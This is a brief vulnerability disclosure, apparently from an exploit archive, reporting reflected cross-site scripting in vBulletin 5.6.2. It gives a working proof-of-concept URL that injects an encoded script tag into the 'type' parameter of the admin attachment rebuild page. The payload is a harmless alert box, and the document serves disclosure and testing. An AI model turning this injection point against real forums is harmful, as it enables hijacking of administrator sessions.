# Exploit Title: vBulletin 5.6.2 Cross Site Scripting # Date:12.08.2020 # Author: Vincent666 ibn Winnie # Software Link: https://www.vbulletin.com/en/features/ # Tested on: Windows 10 # Web Browser: Mozilla Firefox # Blog : https://pentest-vincent.blogspot.com/ # PoC: https://pentest-vincent.blogspot.com/2020/08/cross-site-scripting-in-vbulletin-ver.html So.. We have a cross site scripting in the vBulletin 5.6.2 PoC: I use demo admin panel for test. Our vuln link : https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=[our xss is here] Full link with code: https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=%22%22%3E%3Cscript%3Ealert(%22cross%20site%20scripting%20%22)%3C/script%3E Picture: https://imgur.com/a/OicFHyA